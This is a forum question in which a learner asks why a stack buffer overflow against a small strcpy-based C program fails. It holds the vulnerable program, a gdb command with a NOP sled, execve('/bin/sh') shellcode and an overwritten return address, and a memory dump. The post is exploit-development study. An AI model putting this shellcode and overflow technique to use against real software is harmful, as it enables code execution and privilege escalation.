Reputation: 145
How to use buffer overflow to execute shell code?
i am learning about how buffer overflow work and i tried some basic buffer overflow case, but i got an error while changing the return address. The return address is correct and the operation inside that memory also correct, but my problem is the rip (instruction pointer) wont move to the address.
my simple program code:
int main(int argc, char **argv){
char str[256];
strcpy(str, argv[1]);
printf("%s\n", str);
return 0;
}
first i search my 'str' address in gdb and i found it at 0x7fffffffe0d0 and the return address located at 0x7fffffffe1d8 so i have 264 free space to input NOP and shellcode. but after i compiled it, gcc still gave me segmentation fault and when i debugged it, gdb ask me 0x00007fffffffe110 in ?? () the return address is same as the syntax that i wrote, i want to move to that address because that memory still contain NOP and i tought the instruction pointer will sled to the shellcode. can someone help me to solve my problem.
my syntax in gdb :
run $(python -c 'print "\x90" * 218 + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x10\xe1\xff\xff\xff\x7f"')
0x7fffffffe0d0: 0x9090909090909090 0x9090909090909090
0x7fffffffe0e0: 0x9090909090909090 0x9090909090909090
0x7fffffffe0f0: 0x9090909090909090 0x9090909090909090
0x7fffffffe100: 0x9090909090909090 0x9090909090909090
0x7fffffffe110: 0x9090909090909090 0x9090909090909090
0x7fffffffe120: 0x9090909090909090 0x9090909090909090
0x7fffffffe130: 0x9090909090909090 0x9090909090909090
0x7fffffffe140: 0x9090909090909090 0x9090909090909090
0x7fffffffe150: 0x9090909090909090 0x9090909090909090
0x7fffffffe160: 0x9090909090909090 0x9090909090909090
0x7fffffffe170: 0x9090909090909090 0x9090909090909090
0x7fffffffe180: 0x9090909090909090 0x9090909090909090
0x7fffffffe190: 0x9090909090909090 0x9090909090909090
0x7fffffffe1a0: 0x9090909090909090 0xdb3146b0c0319090
0x7fffffffe1b0: 0x315b16eb80cdc931 0x89085b89074388c0
0x7fffffffe1c0: 0x8d084b8d0bb00c43 0xffffe5e880cd0c53
0x7fffffffe1d0: 0x68732f6e69622fff 0x00007fffffffe110
thanks !!
Upvotes: 0
Views: 143
Answers (0)
Related Questions
- How do I prompt for Yes/No/Cancel input in a Linux shell script?
- Bufferoverflow - assembly changes after pushing string to stack
- Program doesn't respond to the shell code passed to it
- Format String exploit - opening root shell
- what is hex version of a command , what does it mean in reality , how is this done
- Homework - Cannot exploit bufferoverflow